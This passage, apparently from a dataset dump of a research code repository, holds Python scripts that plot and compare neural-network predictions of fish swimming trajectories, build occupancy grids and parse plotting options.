args.pred_len))\n\n ot = trajectories[i:(i + args.pred_len +\n args.num_timesteps), :]\n\n simu_ok = False\n t = ot.copy()\n t[-args.pred_len:, :] = t[args.num_timesteps, :]\n simu_ok, gen_t, means, stds = simulate(t, model, args)\n\n if simu_ok:\n gt_fname = args.reference.replace(\n '.dat', '_gt.dat').replace('raw', 'trajectory_pred/' + args.backend)\n np.savetxt(gt_fname, ot)\n np.savetxt(gt_fname.replace('_gt.dat', '_means.dat'), means)\n np.savetxt(gt_fname.replace('_gt.dat', '_stds.dat'), stds)\n np.savetxt(gt_fname.replace('_gt.dat', '_pred.dat'), gen_t)\n\n diff_1 = np.linalg.norm(\n ot[args.num_timesteps:, :2] - gen_t[:, :2], axis=1)\n diff_2 = np.linalg.norm(\n ot[args.num_timesteps:, 2:] - gen_t[:, 2:], axis=1)\n diff = np.vstack([diff_1, diff_2])\n diff_fname = gt_fname.replace('gt', 'norm')\n np.savetxt(diff_fname, diff.T)\n args.reference = f\n\n\ndef lighten_color(color, amount=0.5):\n try:\n c = mc.cnames[color]\n except:\n c = color\n c = colorsys.rgb_to_hls(*mc.to_rgb(c))\n return colorsys.hls_to_rgb(c[0], 1 - amount * (1 - c[1]), c[2])\n\n\ndef bplot(data, ax, ticks=False):\n paper_rc = {'lines.linewidth': 1, 'lines.markersize': 10}\n sns.set_context(\"paper\", rc=paper_rc)\n\n ax = sns.boxplot(data=data, width=0.25, notch=False,\n saturation=1, linewidth=1.0, ax=ax,\n # whis=[5, 95],\n showfliers=False,\n palette=[\"#ed8b02\", \"#e74c3c\"]\n )\n\n means = []\n stds = []\n for d in data:\n means.append([np.nanmean(list(d))])\n stds.append([np.nanstd(list(d))])\n sns.swarmplot(data=means, palette=['#000000'] * 10,\n marker='H', size=5, ax=ax)\n return means, stds\n\n\ndef create_bplot_grid(data, title, outfile, labels):\n means = []\n stds = []\n\n fig = plt.figure()\n fig.set_figwidth(6)\n fig.set_figheight(3)\n gs0 = fig.add_gridspec(1, 3)\n ax0 = fig.add_subplot(gs0[0])\n ax1 = fig.add_subplot(gs0[1])\n ax2 = fig.add_subplot(gs0[2])\n\n m, s = bplot(data[:2], ax0)\n ax0.set_ylabel(\n 'Trajectory deviation (BL)')\n ax0.set_xlabel('')\n ax0.set_title('0.12 s')\n ax0.set_ylim([0, 1.4])\n ax0.set_xticklabels([])\n ax0.spines['right'].set_color('none')\n means.append(m)\n stds.append(s)\n\n m, s = bplot(data[2:4], ax1)\n ax1.set_ylabel('')\n ax1.set_xlabel('')\n ax1.set_title('0.24 s')\n ax1.set_ylim([0, 1.4])\n ax1.set_yticklabels([])\n ax1.set_xticklabels([])\n ax1.spines['right'].set_color('none')\n ax1.spines['left'].set_color('none')\n means.append(m)\n stds.append(s)\n\n m, s = bplot(data[4:], ax2)\n ax2.set_ylabel('')\n ax2.set_xlabel('')\n ax2.set_title('0.36 s')\n ax2.set_ylim([0, 1.4])\n ax2.set_yticklabels([])\n ax2.set_xticklabels([])\n ax2.spines['left'].set_color('none')\n means.append(m)\n stds.append(s)\n\n ax0.axvline(x=1.5, ymin=0.0, ymax=1.0, color='black')\n ax1.axvline(x=1.5, ymin=0.0, ymax=1.0, color='black')\n\n ax0.legend(handles=handles_a,\n handletextpad=0.5, columnspacing=1,\n loc=\"upper left\", ncol=1, framealpha=0, frameon=False, fontsize=9)\n\n extra = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False,\n edgecolor='none', linewidth=0)\n shapeList = [\n Circle((0, 0), radius=1, facecolor='#ed8b02'),\n Circle((0, 0), radius=1, facecolor='#e74c3c'),\n ]\n\n l = fig.legend(shapeList, labels, shadow=True, bbox_to_anchor=(0.5, 0.02),\n handletextpad=0.5, columnspacing=1,\n loc=\"lower center\", ncol=4, frameon=False, fontsize=9)\n\n plt.subplots_adjust(wspace=0, hspace=0)\n # plt.title(title)\n plt.savefig(outfile, dpi=300)\n\n print('{} Means for leaders: {}'.format(title, means))\n print('{} Stds for leaders: {}'.format(title, stds))\n\n\ndef 
plot_pred_accuracy(traj_path, exp_files, path, args):\n files = glob.glob(traj_path + '**/*_norm.dat')\n\n data = {}\n directories = []\n for f in files:\n directory = f.split('/')[-2]\n norm = (np.loadtxt(f) * args.radius) / args.body_len\n\n if directory not in data.keys():\n directories.append(directory)\n data[directory] = {}\n data[directory]['focal'] = {}\n for i in range(args.pred_len):\n data[directory]['focal'][i] = []\n for j in range(1, norm.shape[1]):\n if 'neigh{}'.format(j) not in data[directory].keys():\n data[directory]['neigh{}'.format(j)] = {}\n data[directory]['neigh{}'.format(j)][i] = []\n\n for m in range(norm.shape[0]):\n data[directory]['focal'][m].append(norm[m, 0])\n for n in range(1, norm.shape[1]):\n data[directory]['neigh{}'.format(n)][m].append(norm[m, n])\n\n focals = []\n neighs = []\n labels_f = []\n labels_n = []\n for m in range(args.pred_len):\n for key in directories:\n focals.append(data[key]['focal'][m])\n labels_f.append('{} step {}'.format(key, m+1))\n for n in range(1, norm.shape[1]):\n neighs.append(data[key]['neigh{}'.format(n)][m])\n labels_n.append('{} step {}'.format(key, m+1))\n\n labels = copy(directories)\n for i in range(len(labels)):\n if labels[i] == 'trajnet':\n labels[i] = 'Social-DLSTM'\n elif labels[i] == 'keras':\n labels[i] = 'HR-NNig'\n\n create_bplot_grid(focals, 'Focal individual predictions',\n traj_path + 'focals.png', labels)\n create_bplot_grid(neighs, 'Neighboring individual predictions',\n traj_path + 'neighs.png', labels)\n\n\ndef fish_image_on_axis(pictures, vel, traj, ax, args):\n phi = np.arctan2(vel[args.num_timesteps-1, 1],\n vel[args.num_timesteps-1, 0]) * 180 / np.pi\n rimage = pictures[0].rotate(phi)\n size = 2.7\n ax.imshow(rimage, extent=[\n traj[args.num_timesteps-1, 0] -\n size, traj[args.num_timesteps-1, 0] + size,\n traj[args.num_timesteps-1, 1] - size, traj[args.num_timesteps-1, 1] + size], aspect='equal', zorder=10)\n\n for n in range(1, traj.shape[1] // 2):\n phi = np.arctan2(vel[args.num_timesteps-1, n * 2 + 1],\n vel[args.num_timesteps-1, n * 2]) * 180 / np.pi\n rimage = pictures[1].rotate(phi)\n ax.imshow(rimage, extent=[\n traj[args.num_timesteps-1, n * 2] -\n size, traj[args.num_timesteps-1, n * 2] + size,\n traj[args.num_timesteps-1, n * 2 + 1] - size, traj[args.num_timesteps-1, n * 2 + 1] + size], aspect='equal', zorder=10)\n\n\ndef plot_fish_pred_cone(traj_path, exp_files, path, args):\n dirs = []\n files = glob.glob(traj_path + '*')\n for f in files:\n if os.path.isdir(f):\n if f.split('/')[-1] != 'skip':\n dirs.append(f.split('/')[-1])\n\n files = glob.glob(traj_path + '{}/*_pred.dat'.format(dirs[0]))\n\n mpath = os.path.dirname(fp.__file__)\n pictures = [Image.open(\n mpath + '/res/fish_red_nicer.png') # .resize((45, 45))\n ,\n Image.open(\n mpath + '/res/fish_blue_nicer.png')\n # .resize((45, 45)),\n ]\n\n data = {}\n for fno, f in enumerate(files):\n gtruth = np.loadtxt(f.replace('_pred.dat', '_gt.dat')) * args.radius\n vel = Velocities([gtruth], args.timestep).get()[0]\n\n abort = False\n data = {}\n for d in dirs:\n fcomp = f.replace(dirs[0], d)\n if not os.path.exists(fcomp):\n abort = True\n break\n\n data[d] = {\n 'pred': np.loadtxt(fcomp) * args.radius,\n 'means': np.loadtxt(fcomp.replace('_pred.dat', '_means.dat')) * args.radius,\n 'stds': np.loadtxt(fcomp.replace('_pred.dat', '_stds.dat')) * args.radius,\n }\n\n if abort:\n continue\n\n fig = plt.figure()\n fig.set_figwidth(6)\n fig.set_figheight(6)\n gs0 = fig.add_gridspec(1, 2)\n gs0.set_width_ratios([2, 1])\n gs1 = gs0[0, 
1].subgridspec(2, 1)\n\n ax = fig.add_subplot(gs0[0, 0])\n iax_r = fig.add_subplot(gs1[0, 0])\n iax_l = fig.add_subplot(gs1[1, 0])\n\n # ground truth\n axes = [ax, iax_l, iax_r] # ! this is only limited to 2 models for now\n obs_len = args.num_timesteps\n\n ax = sns.lineplot(x=gtruth[(obs_len-1):, 0], y=gtruth[(obs_len-1):, 1], label='Ground truth (prediction)',\n ax=ax, marker='o', linestyle=':', color='black', zorder=100, markersize=4)\n ax = sns.lineplot(x=gtruth[:obs_len, 0], y=gtruth[:obs_len, 1], label='Ground truth (observation)',\n ax=ax, marker='o', linestyle='--', color='black', zorder=100, markersize=4)\n\n for n in range(1, gtruth.shape[1] // 2):\n ax = sns.lineplot(x=gtruth[(obs_len-1):, n * 2], y=gtruth[(obs_len-1):, n * 2 + 1],\n ax=ax, marker='o', linestyle=':', color='black', zorder=100, markersize=4)\n ax = sns.lineplot(x=gtruth[:obs_len, n * 2], y=gtruth[:obs_len, n * 2 + 1],\n ax=ax, marker='o', linestyle='--', color='black', zorder=100, markersize=4)\n\n # fish images\n for cax in axes:\n fish_image_on_axis(pictures, vel, gtruth, cax, args)\n\n preds = []\n lcolours = sns.color_palette([\"#ed8b02\", \"#e74c3c\"])\n for mnum, (model, meas) in enumerate(data.items()):\n pred = meas['pred']\n means = meas['means']\n stds = meas['stds']\n\n model_label = model\n if model_label == 'keras':\n model_label = 'HR-NNig'\n elif model_label == 'trajnet':\n model_label = 'Social-DLSTM'\n\n xs = []\n ys = []\n for i in range(means.shape[0]):\n xs += np.random.normal(means[i, 0], stds[i, 0], 5000).tolist()\n ys += np.random.normal(means[i, 1], stds[i, 1], 5000).tolist()\n traj = np.array([xs, ys]).T\n\n sub_data = {}\n sub_data[model_label] = [traj]\n x, y, z = construct_grid(sub_data, model_label, args, 10)\n palette = sns.color_palette('viridis', args.grid_bins)\n cmap = ListedColormap(palette)\n c = axes[mnum+1].pcolormesh(x, y, z, cmap=cmap, shading='auto',\n vmin=0.0, vmax=np.max(z), alpha=0.9)\n\n # trajectories\n ax = sns.lineplot(x=pred[:, 0], y=pred[:, 1], label='Prediction ({})'.format(model_label),\n ax=ax, marker='o', linestyle=':', color=lcolours[mnum], zorder=100, markersize=4)\n\n ax = sns.lineplot(x=pred[:, 2], y=pred[:, 3], ax=ax, marker='o',\n linestyle=':', color=lcolours[mnum], zorder=100, markersize=4)\n\n axes[mnum+1] = sns.lineplot(x=pred[:, 0], y=pred[:, 1], ax=axes[mnum+1],\n marker='o', linestyle=':', color=lcolours[mnum], zorder=100, markersize=4)\n\n axes[mnum+1].set_title(model_label)\n preds.append(pred)\n\n # axes\n xys = np.empty((0, 2))\n for n in range(gtruth.shape[1] // 2):\n xys = np.vstack([xys, gtruth[:, (n*2):(n*2+2)]])\n\n for p in preds:\n for n in range(p.shape[1] // 2):\n xys = np.vstack([xys, p[:, (n*2):(n*2+2)]])\n\n mins = np.min(xys, axis=0)\n maxs = np.max(xys, axis=0)\n\n outer = plt.Circle((0, 0), args.radius * 1.0005,\n color='black', fill=False)\n ax.add_artist(outer)\n ax.set_aspect('equal', 'box')\n ax.set_xlabel('x (cm)')\n ax.set_ylabel('y (cm)')\n ax.set_xlim([mins[0] - 2, maxs[0] + 2])\n ax.set_ylim([mins[1] - 2, maxs[1] + 2])\n # sns.set_style(\"whitegrid\", {'axes.grid' : False})\n ax.get_legend().remove()\n ax.tick_params(axis='both', which='major', labelsize=13)\n ax.tick_params(axis='both', which='minor', labelsize=13)\n\n for idx, pred in enumerate(preds):\n xys = np.empty((0, 2))\n xys = np.vstack([xys, gtruth[-args.pred_len-2:, :2]])\n xys = np.vstack([xys, pred[:, :2]])\n mins = np.min(xys, axis=0)\n maxs = np.max(xys, axis=0)\n\n outer = plt.Circle((0, 0), args.radius * 1.0005,\n color='black', fill=False)\n 
axes[idx+1].add_artist(outer)\n axes[idx+1].set_aspect('equal', 'box')\n axes[idx+1].set_xlim([mins[0] - 1, maxs[0] + 1])\n axes[idx+1].set_ylim([mins[1] - 1, maxs[1] + 1])\n axes[idx+1].set_yticklabels([])\n axes[idx+1].set_xticklabels([])\n\n plt.savefig(traj_path + '{}.png'.format(f.split('/')[-1].replace(\n 'processed_positions', 'trajectory').replace('_pred.dat', '')), dpi=300)\n plt.close()\n\n\ndef plot(exp_files, path, args):\n traj_path = args.path + '/trajectory_pred/'\n if args.force_regenerate or not os.path.isdir(traj_path + args.backend):\n generate_traj(exp_files, path, args)\n\n plot_pred_accuracy(traj_path, exp_files, path, args)\n # plot_fish_pred_cone(traj_path, exp_files, path, args)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Plot trajectory predictions given a trained model and the ground truth file(s)')\n parser.add_argument('--nn_model_ref',\n type=str,\n help='Model to consider as reference for its parameters',\n default='best_model.h5',\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--radius',\n type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--center',\n type=float,\n nargs='+',\n help='The centroidal coordinates for the setups used',\n default=[0.0, 0.0],\n required=False)\n parser.add_argument('--num_timesteps',\n type=int,\n help='Observation length for the model',\n default=5,\n required=False)\n parser.add_argument('--pred_len',\n type=int,\n help='Prediction length for the model (Depending on the model, multiple single predictions might be made instead)',\n default=1,\n required=False)\n parser.add_argument('--nn_functor',\n default=available_functors()[0],\n choices=available_functors())\n parser.add_argument('--var_coef', type=float,\n help='Prediction variance coefficient',\n default=1.0,\n required=False)\n parser.add_argument('--force_regenerate',\n action='store_true',\n help='Regenerate trajectory predictions',\n default=False,\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.5693069100379944,
"alphanum_fraction": 0.5891088843345642,
"avg_line_length": 17.363636016845703,
"blob_id": "5b9a998a6c66901751694958f8d3a67bc45ee6d7",
"content_id": "f335e0114b2941c80932337d156271a6bd84ef6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 202,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 11,
"path": "/find/simulation/simu/example.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom simulation.simulation import Simulation\n\n\nif __name__ == '__main__':\n args = {\n 'stats_enabled': True,\n }\n simu = Simulation(1000, args=args)\n simu.spin()\n"
},
{
"alpha_fraction": 0.46076470613479614,
"alphanum_fraction": 0.46607521176338196,
"avg_line_length": 47.650455474853516,
"blob_id": "b9a22d5eb455740494d12e739e40c5631d54bf64",
"content_id": "0500b93e80b559a3b0e2b56433866a0b7fb55940",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16006,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 329,
"path": "/find/plots/plotter.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport argparse\nfrom tqdm import tqdm\n\nimport find.plots.nn as nn\nimport find.plots.spatial as sp\nimport find.plots.correlation as co\nimport find.plots.trajectory_visualisation as vi\nimport find.plots.dl_si_2021 as dl_si_2021\n\nfrom find.simulation.simulation_factory import available_functors\n\n\ndef plot_selector(key):\n if key in sp.available_plots():\n return sp.get_plot(p), sp.source\n elif key in vi.available_plots():\n return vi.get_plot(p), vi.source\n elif key in nn.available_plots():\n return nn.get_plot(p), nn.source\n elif key in co.available_plots():\n return co.get_plot(p), co.source\n elif key in dl_si_2021.available_plots():\n return dl_si_2021.get_plot(p), dl_si_2021.source\n else:\n assert False\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Plot manager')\n parser.add_argument('--path', '-p',\n type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--timestep', '-t',\n type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--timesteps_skip',\n type=int,\n help='Timesteps skipped between input and prediction',\n default=0,\n required=False)\n\n # available plots\n plot_list = sp.available_plots() + vi.available_plots() + \\\n co.available_plots() + nn.available_plots() + dl_si_2021.available_plots()\n\n plot_conf = parser.add_argument_group('Plot configuration')\n plot_conf.add_argument('--plot',\n nargs=\"+\",\n default='all_spatial_and_correllation',\n choices=plot_list + ['all_spatial_and_correllation'])\n plot_conf.add_argument('--plot_out_dir', type=str,\n help='Directory for plot output files (always relative to the experiment path)',\n default='plots',\n required=False)\n plot_conf.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid',\n 'Virtual', 'Virtual (Toulouse)'],\n choices=['Real', 'Hybrid',\n 'Virtual', 'Virtual (Toulouse)', 'Virtual (Toulouse cpp)', 'Robot'])\n plot_conf.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n plot_conf.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n plot_conf.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n plot_conf.add_argument('--virtual_toul_files',\n type=str,\n default='generated_toulouse/TRAJTH_*.dat',\n required=False)\n plot_conf.add_argument('--virtual_toul_cpp_files',\n type=str,\n default='generated_toulouse_cpp/positions*.dat',\n required=False)\n plot_conf.add_argument('--robot_files',\n type=str,\n default='robot_raw/*processed_positions.dat',\n required=False)\n plot_conf.add_argument('--num_virtual_samples',\n type=int,\n help='Number of samples to use when computing metrics for the virtual data',\n default=-1,\n required=False)\n\n spatial_options = parser.add_argument_group('Spatial plot options')\n spatial_options.add_argument('--radius', '-r',\n type=float,\n help='Radius',\n default=0.25,\n required=False)\n spatial_options.add_argument('--grid_bins',\n type=int,\n help='Number of bins for the occupancy grid plot',\n default=416,\n required=False)\n spatial_options.add_argument('--grid_smooth',\n action='store_true',\n help='Smooth the grid for visual reasons if true',\n default=False,\n required=False)\n spatial_options.add_argument('--grid_cutoff_thres',\n type=float,\n help='Cutoff point threshold for the percentage of points that are allowed to be removed to not 
squash the grid drawing colours',\n                                 default=0.05,\n                                 required=False)\n    spatial_options.add_argument('--grid_cutoff_val',\n                                 type=float,\n                                 help='Force the cutoff value of the grid for consistency (overrides grid_cutoff_thres)',\n                                 default=-1,\n                                 required=False)\n    spatial_options.add_argument('--kde_gridsize',\n                                 type=int,\n                                 help='Grid size for kernel density estimation plots',\n                                 default=5000,\n                                 required=False)\n    spatial_options.add_argument('--center',\n                                 type=float,\n                                 nargs='+',\n                                 help='The centroidal coordinates for the setups used',\n                                 default=[0.0, 0.0],\n                                 required=False)\n    spatial_options.add_argument('--prediction_len', type=int,\n                                 help='Predictions to plot',\n                                 default=5,\n                                 required=False)\n    spatial_options.add_argument('--observation_len', type=int,\n                                 help='Observations to plot',\n                                 default=0,\n                                 required=False)\n    spatial_options.add_argument('--radius_grid_res',\n                                 type=float,\n                                 help='Resolution (in m) for the radius of the focal individual in the future trajectory variance plot',\n                                 default=0.025,\n                                 required=False)\n    spatial_options.add_argument('--angle_grid_res',\n                                 type=int,\n                                 help='Resolution (in deg) for the angle to the wall of the focal individual in the future trajectory variance plot',\n                                 default=5,\n                                 required=False)\n    spatial_options.add_argument('--interdist_grid_res',\n                                 type=float,\n                                 help='Resolution (in m) for the interindividual distance in the future trajectory variance plot',\n                                 default=0.025,\n                                 required=False)\n    spatial_options.add_argument('--viewing_angle_grid_res',\n                                 type=float,\n                                 help='Resolution (in deg) for the viewing angle in the future trajectory variance plot',\n                                 default=45,\n                                 required=False)\n\n    cor_plot = parser.add_argument_group('Correlation plot options')\n    cor_plot.add_argument('--tcor',\n                          type=float,\n                          default=25.0,\n                          help='Time window to consider when computing correlation metrics',\n                          required=False)\n    cor_plot.add_argument('--ntcor',\n                          type=int,\n                          default=1,\n                          help='Number of timesteps to include in the correlation metrics computation',\n                          required=False)\n\n    traj_options = parser.add_argument_group(\n        'Trajectory visualisation plot options')\n    traj_options.add_argument('--traj_visualisation_list',\n                              type=str,\n                              nargs='+',\n                              help='List of files to visualise',\n                              default='random',\n                              required=False)\n    traj_options.add_argument('--open', action='store_true',\n                              help='Visualize the open setup', default=False)\n    traj_options.add_argument('--fish_like', action='store_true',\n                              help='Images instead of points',\n                              default=False)\n    traj_options.add_argument('--turing', action='store_true',\n                              help='Same image for all individuals to perform a Turing test',\n                              default=False)\n    traj_options.add_argument('--info', action='store_true',\n                              help='Display info',\n                              default=False)\n    traj_options.add_argument('--dark', action='store_true',\n                              help='Render dark-friendly icons',\n                              default=False)\n    traj_options.add_argument('--exclude_index', '-e', type=int,\n                              help='Index of the virtual individual',\n                              required=False,\n                              default=-1)\n    traj_options.add_argument('--range', nargs='+',\n                              type=int,\n                              help='Vector containing the start and end index of trajectories to be plotted',\n                              required=False)\n    traj_options.add_argument('--dpi', type=int,\n                              help='DPI for the saved figures',\n                              default=300,\n                              required=False)\n    traj_options.add_argument('--tail_period',\n                              type=float,\n                              help='Tail frequency to change the image of the fish (only used in fish_like)',\n                              default=0.5,\n                              required=False)\n    traj_options.add_argument('--fill_between', type=int,\n                              help='Fill frames between timesteps',\n                              default=0,\n                              required=False)\n    
traj_options.add_argument('--body_len', type=float,\n                              help='Body length of the individuals (for fish)',\n                              default=0.035,\n                              required=False)\n\n    nn_options = parser.add_argument_group(\n        'NN training history visualisation options')\n    nn_options.add_argument('--nn_compare_dirs',\n                            type=str,\n                            nargs='+',\n                            help='List of directories to look through and analyse',\n                            required=False)\n    nn_options.add_argument('--nn_compare_out_dir',\n                            type=str,\n                            help='Directory to output NN analysis results',\n                            default='nn_comparison',\n                            required=False)\n    nn_options.add_argument('--nn_delimiter',\n                            type=str,\n                            help='Delimiter used in the log files',\n                            default=',',\n                            required=False)\n    nn_options.add_argument('--nn_last_epoch',\n                            type=int,\n                            help='Plot up to nn_last_epoch data points. -1 stands for all, -2 stands for up to the min of iterations across the experiments',\n                            default=-1,\n                            required=False)\n    nn_options.add_argument('--nn_num_legend_parents',\n                            type=int,\n                            help='Number of parent directories to show in the legend',\n                            default=1,\n                            required=False)\n    nn_options.add_argument('--nn_num_sample_epochs',\n                            type=int,\n                            help='Number of samples to plot. -1 will consider all available points',\n                            default=-1,\n                            required=False)\n    nn_options.add_argument('--nn_model_ref',\n                            type=str,\n                            help='Model to consider as reference for its parameters',\n                            default='best_model.h5',\n                            required=False)\n    nn_options.add_argument('--backend',\n                            help='Backend selection',\n                            default='keras',\n                            choices=['keras', 'trajnet'])\n    nn_options.add_argument('--num_timesteps',\n                            type=int,\n                            help='Observation length for the model',\n                            default=5,\n                            required=False)\n    nn_options.add_argument('--pred_len',\n                            type=int,\n                            help='Prediction length for the model (Depending on the model, multiple single predictions might be made instead)',\n                            default=1,\n                            required=False)\n    nn_options.add_argument('--nn_functor',\n                            default=available_functors()[0],\n                            choices=available_functors())\n    nn_options.add_argument('--var_coef', type=float,\n                            help='Prediction variance coefficient',\n                            default=1.0,\n                            required=False)\n    nn_options.add_argument('--force_regenerate',\n                            action='store_true',\n                            help='Regenerate trajectory predictions',\n                            default=False,\n                            required=False)\n    args = parser.parse_args()\n    args.timestep = args.timestep * (args.timesteps_skip + 1)\n    args.plot_out_dir = args.path + '/' + args.plot_out_dir\n\n    if args.plot == 'all_spatial_and_correllation':\n        args.plot = sp.available_plots() + co.available_plots()\n\n    if args.plot == 'all_spatial':\n        args.plot = sp.available_plots()\n\n    if args.plot == 'all_correlation':\n        args.plot = co.available_plots()\n\n    exp_files = {}\n    for t in args.type:\n        if t == 'Real':\n            exp_files[t] = args.original_files\n        elif t == 'Hybrid':\n            exp_files[t] = args.hybrid_files\n        elif t == 'Virtual':\n            exp_files[t] = args.virtual_files\n        elif t == 'Virtual (Toulouse)':\n            exp_files[t] = args.virtual_toul_files\n        elif t == 'Virtual (Toulouse cpp)':\n            exp_files[t] = args.virtual_toul_cpp_files\n        elif t == 'Robot':\n            exp_files[t] = args.robot_files\n\n    if not os.path.exists(args.plot_out_dir):\n        os.makedirs(args.plot_out_dir)\n\n    for p in tqdm(args.plot, desc='Plotting the selected quantities ({})'.format(len(args.plot))):\n        pfunc, ptype = plot_selector(p)\n\n        if ptype == 'nn':\n            outpath = args.nn_compare_out_dir\n            if not os.path.exists(outpath):\n                os.makedirs(outpath)\n        else:\n            outpath = args.plot_out_dir + '/' + ptype + '/'\n            if not os.path.exists(outpath):\n                os.makedirs(outpath)\n\n        pfunc(exp_files, outpath, args)\n"
},
{
"alpha_fraction": 0.4839712679386139,
"alphanum_fraction": 0.5021979212760925,
"avg_line_length": 34.735633850097656,
"blob_id": "747bee64556338766226a42bd1321da417abc142",
"content_id": "36c91e2fb10823da53ff62f0bc1d7edaaa8e9ae8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9327,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 261,
"path": "/find/plots/spatial/grid_occupancy.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport glob\nimport argparse\nimport numpy as np\n\nfrom find.plots.common import *\n\nimport matplotlib\nimport scipy.stats as st\nfrom scipy.ndimage.filters import gaussian_filter\n\n\ndef construct_grid(data, type, args, sigma=5.0):\n y, x = np.meshgrid(np.linspace(args.center[0] - (args.radius + 0.01),\n args.center[0] + (args.radius + 0.01), args.grid_bins),\n np.linspace(args.center[1] - (args.radius + 0.01),\n args.center[1] + (args.radius + 0.01), args.grid_bins))\n z = np.zeros([args.grid_bins, args.grid_bins])\n\n total_steps = 0\n for traj in data[type]:\n tsteps = traj.shape[0]\n total_steps += tsteps\n individuals = traj.shape[1] // 2\n idcs = range(individuals)\n\n for i in range(tsteps):\n for j in idcs:\n traj_x = traj[i, j * 2]\n traj_y = traj[i, j * 2 + 1]\n dist_x = np.abs(np.array(traj_x - x[:, 0]))\n dist_y = np.abs(np.array(traj_y - y[0, :]))\n min_xidx = np.argmin(dist_x)\n min_yidx = np.argmin(dist_y)\n z[min_xidx, min_yidx] += 1\n z /= (data[type][0].shape[1] // 2) * total_steps\n z *= 100\n\n if type == 'Real' or type == 'Hybrid':\n # here there is a stationary instance which seems to be a data issue\n # we smooth approximately 0.07% instances that are abnormally big (perhaps tracking error)\n z[z > 0.0045] = np.mean(z)\n print('Occupancy grid computed for type: {}'.format(type))\n\n if args.grid_smooth:\n z = gaussian_filter(z, sigma=sigma)\n\n return x, y, z\n\n\ndef occupancy_grid(data, grid, fig, type, ax, args, draw_colorbar=True, pad=0.1):\n x, y, z = grid['x'], grid['y'], grid['z']\n\n cutoff_val = args.grid_cutoff_val\n if cutoff_val < 0:\n step = 0.0005\n cutoff = list(np.arange(step, np.max(z) + step / 2, step))\n cutoff_val = step\n for i in range(len(cutoff)):\n c = cutoff[i]\n if np.sum(np.array(z > c)) / np.size(z) > args.grid_cutoff_thres:\n if i+1 < len(cutoff):\n cutoff_val = cutoff[i+1]\n else:\n cutoff_val = cutoff[i]\n lb, ub = np.min(z), cutoff_val\n\n # we need a custom palette for this plot\n # palette = sns.color_palette('viridis', args.grid_bins * args.grid_bins)\n # cmap = ListedColormap(palette.as_hex())\n cmap = matplotlib.cm.get_cmap('jet')\n\n c = ax.pcolormesh(x, y, z, cmap=cmap, shading='auto',\n vmin=lb, vmax=ub, alpha=1.0)\n\n if draw_colorbar:\n fig.colorbar(c, ax=ax, label='Cell occupancy (%)',\n location='left', pad=pad, extend='max')\n\n ax.set_yticks(np.arange(-args.radius,\n args.radius + 0.001, args.radius / 2))\n ax.set_xticks(np.arange(-args.radius,\n args.radius + 0.001, args.radius / 2))\n ax.set_xlim([-(args.radius * 1.05), args.radius * 1.05])\n ax.set_ylim([-(args.radius * 1.05), args.radius * 1.05])\n ax.set_title(type)\n\n outer = plt.Circle((0, 0), args.radius * 1.0005,\n color='white', fill=False)\n ax.add_artist(outer)\n ax.set_aspect('equal', 'box')\n\n return ax, c\n\n\ndef grid_difference(grids, type1, type2, fig, ax, args, draw_colorbar=True, pad=0.1):\n cmap = matplotlib.cm.get_cmap('jet')\n\n r_x = grids[type1]['x']\n r_y = grids[type1]['y']\n r_z = grids[type1]['z']\n z_diff = r_z - grids[type2]['z']\n\n vmax = args.grid_cutoff_val\n if vmax < 0:\n vmax = np.max(z_diff)\n\n c = ax.pcolormesh(r_x, r_y, np.abs(z_diff), cmap=cmap, shading='auto',\n vmin=0,\n vmax=vmax, alpha=1.0\n )\n\n if draw_colorbar:\n fig.colorbar(c, ax=ax, label='Cell occupancy (%)',\n location='left', pad=pad, extend='max')\n\n ax.set_yticks(np.arange(-args.radius,\n args.radius + 0.001, args.radius / 2))\n ax.set_xticks(np.arange(-args.radius,\n args.radius + 0.001, args.radius / 2))\n 
ax.set_xlim([-(args.radius * 1.05), args.radius * 1.05])\n    ax.set_ylim([-(args.radius * 1.05), args.radius * 1.05])\n\n    if type1 == 'Virtual (Toulouse)':\n        type1 = 'ABC'\n    if type2 == 'Virtual (Toulouse)':\n        type2 = 'ABC'\n\n    if type1 == 'Virtual':\n        type1 = 'HR-NNig'\n    if type2 == 'Virtual':\n        type2 = 'HR-NNig'\n\n    if type1 == 'Real':\n        type1 = 'CD'\n    if type2 == 'Real':\n        type2 = 'CD'\n\n    ax.set_title('|{} - {}|'.format(type1, type2))\n\n    outer = plt.Circle((0, 0), args.radius * 1.0005,\n                       color='white', fill=False)\n    ax.add_artist(outer)\n    ax.set_aspect('equal', 'box')\n\n    return ax, c\n\n\ndef plot(exp_files, path, args):\n    grids = {}\n    for k, v in exp_files.items():\n        data = {}\n        data[k] = []\n        files = glob.glob(args.path + '/' + v)\n        for f in files:\n            data[k].append(np.loadtxt(f) * args.radius)\n        print('Done loading data for type: {}'.format(k))\n\n        x, y, z = construct_grid(data, k, args)\n        